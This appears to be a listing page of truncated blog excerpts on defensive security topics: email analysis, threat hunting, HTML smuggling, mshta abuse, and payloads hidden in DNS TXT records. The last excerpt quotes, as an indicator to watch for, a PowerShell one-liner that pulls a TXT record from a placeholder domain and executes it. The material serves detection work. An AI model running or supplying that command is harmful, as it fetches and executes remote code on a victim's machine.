Email analysis checklists
I divided this analysis into four pieces to help us better understand the investigation flow. Email address: Before investigation, always drill down the email address further in 3 parts for detaile...
It presents an assortment of improved workflows for defense security, specifically addressing the areas of detection engineering, threat hunting, reverse engineering, and digital forensics. The pri...
HTML-Smuggling: HTML Smuggling is an evasive payload delivery method that helps an attacker smuggle a payload past content filters and firewalls by hiding malicious payloads inside of seemingly benign...
Mshta is attractive to adversaries both in the early and latter stages of an infection because it enables them to proxy the execution of arbitrary code through a trusted utility. Process and comman...
Windows: Malicious Payload in DNS Txt. An attacker can put a malicious payload in the DNS TXT record content of a domain. So, watch out for: powershell . (nslookup -q=txt some.domain.com)[-1] Curl with ca...